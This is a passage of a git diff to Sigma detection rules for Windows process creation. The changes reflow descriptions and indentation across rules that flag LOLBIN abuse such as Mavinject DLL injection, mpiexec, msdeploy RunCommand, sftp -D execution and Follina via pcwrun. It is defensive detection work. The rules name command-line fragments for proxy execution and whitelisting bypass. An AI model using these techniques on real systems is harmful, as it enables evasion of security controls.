CommandLine|contains: + CommandLine|contains: - 'VsWherePath ' - 'VsInstallationPath ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml index 106f04be9..a3292fba8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml @@ -1,8 +1,7 @@ title: Potential Manage-bde.wsf Abuse To Proxy Execution id: c363385c-f75d-4753-a108-c1a8e28bdbda status: test -description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to - proxy execution +description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution references: - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/ - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 @@ -23,19 +22,18 @@ detection: EventID: 4688 Channel: Security selection_wscript_img: - - NewProcessName|endswith: \wscript.exe - - OriginalFileName: wscript.exe + - NewProcessName|endswith: \wscript.exe + - OriginalFileName: wscript.exe selection_wscript_cli: - CommandLine|contains: manage-bde.wsf + CommandLine|contains: manage-bde.wsf selection_parent: ParentCommandLine|contains: manage-bde.wsf ParentProcessName|endswith: - \cscript.exe - \wscript.exe selection_filter_cmd: - NewProcessName|endswith: \cmd.exe - condition: process_creation and (all of selection_wscript_* or (selection_parent - and not selection_filter_cmd)) + NewProcessName|endswith: \cmd.exe + condition: process_creation and (all of selection_wscript_* or (selection_parent and not selection_filter_cmd)) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml index 58a14f39e..6b865df7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml @@ -1,18 +1,17 @@ title: Mavinject Inject DLL Into Running Process id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 related: - - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 - type: obsoletes + - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 + type: obsoletes status: test -description: Detects process injection using the signed Windows tool "Mavinject" via - the "INJECTRUNNING" flag +description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet - https://github.com/SigmaHQ/sigma/issues/3742 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection author: frack113, Florian Roth @@ -31,7 +30,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' filter: ParentProcessName: C:\Windows\System32\AppVClient.exe condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml index 352150645..19dd710aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml @@ -1,8 +1,7 @@ title: MpiExec Lolbin id: 729ce0ea-5d8f-4769-9762-e35de441586d status: test -description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN - from HPC pack that can be used to execute any other binary +description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1465058133303246867 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_binary: - - NewProcessName|endswith: \mpiexec.exe - - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 - - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 + - NewProcessName|endswith: \mpiexec.exe + - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 + - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /n 1 ' - ' -n 1 ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml index 43d4b1c7b..4d3583a1d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml @@ -20,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - verb:sync - -source:RunCommand - -dest:runCommand - NewProcessName|endswith: \msdeploy.exe + NewProcessName|endswith: \msdeploy.exe condition: process_creation and selection fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml index fddda24bd..39daa37fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml @@ -1,9 +1,7 @@ title: Execute MSDT Via Answer File id: 9c8c7000-3065-44a8-a555-79bcba5d9955 status: test -description: Detects execution of "msdt.exe" using an answer file which is simulating - the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility - tab) +description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_cli: - CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml - NewProcessName|endswith: \msdt.exe + CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml + NewProcessName|endswith: \msdt.exe selection_answer: - CommandLine|contains: + CommandLine|contains: - ' -af ' - ' /af ' filter: diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml index 0c22c631b..fb9b6d377 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml @@ -1,8 +1,7 @@ title: Use of OpenConsole id: 814c95cc-8192-4378-a70a-f1aafd877af1 status: test -description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries - to bypass application Whitelisting +description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting references: - https://twitter.com/nas_bench/status/1537563834478645252 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: OpenConsole.exe - - NewProcessName|endswith: \OpenConsole.exe + - OriginalFileName: OpenConsole.exe + - NewProcessName|endswith: \OpenConsole.exe filter: - NewProcessName|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal + NewProcessName|startswith: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal condition: process_creation and (selection and not filter) falsepositives: - Legitimate use by an administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml index 3711e1b52..71592d1c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_openwith.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /c - NewProcessName|endswith: \OpenWith.exe + CommandLine|contains: /c + NewProcessName|endswith: \OpenWith.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml index f50aa149b..e70e24e4d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml @@ -1,17 +1,14 @@ title: Use of Pcalua For Execution id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: Detects execition of commands and binaries from the context of The program - compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to - bypass application whitelisting. +description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic - Blue Detections, Endgame), oscd.community +author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2023/01/04 tags: @@ -25,8 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' -a' - NewProcessName|endswith: \pcalua.exe + CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a "-a" + NewProcessName|endswith: \pcalua.exe condition: process_creation and selection falsepositives: - Legitimate use by a via a batch script or by an administrator. diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml index b9c982ab3..9f3575721 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution By Program Compatibility Wizard id: b97cd4b1-30b8-4a9d-bd72-6293928d52bc status: test -description: Detect indirect command execution via Program Compatibility Assistant - pcwrun.exe +description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe references: - https://twitter.com/pabraeken/status/991335019833708544 - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/ @@ -29,8 +28,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts - Legit usage of scripts level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml index e70543d1c..8b5dba6d0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml @@ -1,8 +1,7 @@ title: Execute Pcwrun.EXE To Leverage Follina id: 6004abd0-afa4-4557-ba90-49d172e0a299 status: test -description: Detects indirect command execution via Program Compatibility Assistant - "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability +description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nas_bench/status/1535663791362519040 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ../ - NewProcessName|endswith: \pcwrun.exe + CommandLine|contains: ../ + NewProcessName|endswith: \pcwrun.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml index 3cb371d8c..04eba32d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml @@ -1,8 +1,7 @@ title: Code Execution via Pcwutl.dll id: 9386d78a-7207-4048-9c9f-a93a7c2d1c05 status: test -description: Detects launch of executable by calling the LaunchApplication function - from pcwutl.dll library. +description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. references: - https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/ - https://twitter.com/harr0ey/status/989617817849876488 @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - pcwutl - LaunchApplication condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml index 0f5d7a88e..bcafbd54c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester.yml @@ -1,11 +1,10 @@ title: Execute Code with Pester.bat as Parent id: 18988e1b-9087-4f8a-82fe-0414dce49878 related: - - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e - type: similar + - id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e + type: similar status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://twitter.com/_st0pp3r_/status/1560072680887525378 diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml index 7a493b481..0afae5a93 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml @@ -1,8 +1,7 @@ title: Execute Code with Pester.bat id: 59e938ff-0d6d-4dc3-b13f-36cc28734d4e status: test -description: Detects code execution via Pester.bat (Pester - Powershell Modulte for - testing) +description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) references: - https://twitter.com/Oddvarmoe/status/993383596244258816 - https://github.com/api0cradle/LOLBAS/blob/d148d278f5f205ce67cfaf49afdfb68071c7252a/OSScripts/pester.md @@ -22,19 +21,19 @@ detection: EventID: 4688 Channel: Security powershell_module: - CommandLine|contains|all: + CommandLine|contains|all: - Pester - Get-Help - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe cmd_execution: - CommandLine|contains|all: + CommandLine|contains|all: - pester - ; - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe get_help: - CommandLine|contains: + CommandLine|contains: - help - \? condition: process_creation and (powershell_module or (cmd_execution and get_help)) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml index 911e77471..1927f1dd8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml @@ -1,8 +1,7 @@ title: PrintBrm ZIP Creation of Extraction id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 status: test -description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to - create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. +description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. references: - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/ author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' -f' - .zip - NewProcessName|endswith: \PrintBrm.exe + NewProcessName|endswith: \PrintBrm.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml index 09307cc8f..80e03c4a0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml @@ -1,8 +1,7 @@ title: Pubprn.vbs Proxy Execution id: 1fb76ab8-fa60-4b01-bddd-71e89bf555da status: test -description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute - commands. +description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands. references: - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/ author: frack113 @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \pubprn.vbs - 'script:' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml index cf56a4a60..7a0309f9a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml @@ -1,8 +1,7 @@ title: DLL Execution via Rasautou.exe id: cd3d1298-eb3b-476c-ac67-12847de55813 status: test -description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d - option and executes the export specified in -p. +description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. references: - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/ - https://github.com/fireeye/DueDLLigence @@ -15,19 +14,16 @@ tags: logsource: product: windows category: process_creation - definition: Since options '-d' and '-p' were removed in Windows 10 this rule is - relevant only for Windows before 10. And as Windows 7 doesn't log command - line in 4688 by default, to detect this attack you need Sysmon 1 configured - or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) + definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) detection: process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rasautou.exe - - OriginalFileName: rasdlui.exe + - NewProcessName|endswith: \rasautou.exe + - OriginalFileName: rasdlui.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - ' -p ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml index 495d1c1a7..d222c45d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_register_app.yml @@ -1,8 +1,7 @@ title: REGISTER_APP.VBS Proxy Execution id: 1c8774a0-44d4-4db0-91f8-e792359c70bd status: test -description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register - a VSS/VDS Provider as a COM+ application. +description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \register_app.vbs - -register condition: process_creation and selection falsepositives: - - Legitimate usage of the script. Always investigate what's being registered to - confirm if it's benign + - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml index d26ac534b..43615d65a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_remote.yml @@ -1,8 +1,7 @@ title: Use of Remote.exe id: 4eddc365-79b4-43ff-a9d7-99422dc34b93 status: test -description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL - bypass and running remote files. +description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. references: - https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/ @@ -19,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \remote.exe - - OriginalFileName: remote.exe + - NewProcessName|endswith: \remote.exe + - OriginalFileName: remote.exe condition: process_creation and selection falsepositives: - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml index 148d1f4ac..1cd032a7b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_replace.yml @@ -1,8 +1,7 @@ title: Replace.exe Usage id: 9292293b-8496-4715-9db6-37028dcda4b3 status: test -description: Detects the use of Replace.exe which can be used to replace file with - another file +description: Detects the use of Replace.exe which can be used to replace file with another file references: - https://lolbas-project.github.io/lolbas/Binaries/Replace/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \replace.exe + NewProcessName|endswith: \replace.exe argument: - CommandLine|contains: + CommandLine|contains: - /a - -a condition: process_creation and (selection and argument) diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml index 45adc3cd3..96b6ff9e9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml @@ -1,8 +1,7 @@ title: Lolbin Runexehelper Use As Proxy id: cd71385d-fd9b-4691-9b98-2b1f7e508714 status: test -description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other - programs +description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs references: - https://twitter.com/0gtweet/status/1206692239839289344 - https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/ diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml index 2730b5264..5f20e9aff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: surfacecheck - NewProcessName|endswith: \Runscripthelper.exe + CommandLine|contains: surfacecheck + NewProcessName|endswith: \Runscripthelper.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml index bdbfa97d6..dbb35f08e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml @@ -1,8 +1,7 @@ title: Use of Scriptrunner.exe id: 64760eef-87f7-4ed3-93fd-655668ea9420 status: test -description: The "ScriptRunner.exe" binary can be abused to proxy execution through - it and bypass possible whitelisting +description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting references: - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ScriptRunner.exe - - OriginalFileName: ScriptRunner.exe + - NewProcessName|endswith: \ScriptRunner.exe + - OriginalFileName: ScriptRunner.exe selection_cli: - CommandLine|contains: ' -appvscript ' + CommandLine|contains: ' -appvscript ' condition: process_creation and (all of selection*) falsepositives: - Legitimate use when App-v is deployed diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml index e24e67e12..e553950c2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_setres.yml @@ -1,9 +1,7 @@ title: Use of Setres.exe id: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7 status: test -description: Detects the use of Setres.exe to set the screen resolution and then potentially - launch a file named "choice" (with any executable extension such as ".cmd" or - ".exe") from the current execution path +description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path references: - https://lolbas-project.github.io/lolbas/Binaries/Setres/ - https://twitter.com/0gtweet/status/1583356502340870144 @@ -24,7 +22,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \setres.exe - NewProcessName|endswith: \choice + NewProcessName|endswith: \choice condition: process_creation and (all of selection*) falsepositives: - Legitimate usage of Setres diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml index 135c794bb..9f1a7a3cb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sftp.yml @@ -1,8 +1,7 @@ title: Use Of The SFTP.EXE Binary As A LOLBIN id: a85ffc3a-e8fd-4040-93bf-78aff284d801 status: test -description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the - "-D" flag +description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag references: - https://github.com/LOLBAS-Project/LOLBAS/pull/264 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Since "-D" is a valid flag for other usage we assume the user is going to enter a path + # Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe" + # In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule) - ' -D ..' - ' -D C:\' - NewProcessName|endswith: \sftp.exe + NewProcessName|endswith: \sftp.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml index 293a78f26..949633705 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml @@ -1,9 +1,7 @@ title: Sideloading Link.EXE id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6 status: test -description: Detects the execution utitilies often found in Visual Studio tools that - hardcode the call to the binary "link.exe". They can be abused to sideload any - binary with the same name +description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name references: - https://twitter.com/0gtweet/status/1560732860935729152 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,8 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: LINK / - NewProcessName|endswith: \link.exe + CommandLine|contains: LINK / # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc + # Add other filters for other legitimate locations + NewProcessName|endswith: \link.exe filter_visual_studio: ParentProcessName|startswith: - C:\Program Files\Microsoft Visual Studio\ diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml index 640833371..1493f8400 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml @@ -1,8 +1,7 @@ title: Suspicious Sigverif Execution id: 7d4aaec2-08ed-4430-8b96-28420e030e04 status: test -description: Detects the execution of sigverif binary as a parent process which could - indicate it being used as a LOLBIN to proxy execution +description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution references: - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://twitter.com/0gtweet/status/1457676633809330184 diff --git a/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml b/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml index 1e2136f82..38e1239b9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_lolbin_ssh.yml @@ -22,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_parent: + # ParentCommandLine: '"C:\Windows\System32\OpenSSH\sshd.exe" -R' ParentProcessName: C:\Windows\System32\OpenSSH\sshd.exe selection_cli_img: - NewProcessName|endswith: \ssh.exe + NewProcessName|endswith: \ssh.exe selection_cli_flags: - - CommandLine|contains: ProxyCommand= - - CommandLine|contains|all: - - PermitLocalCommand 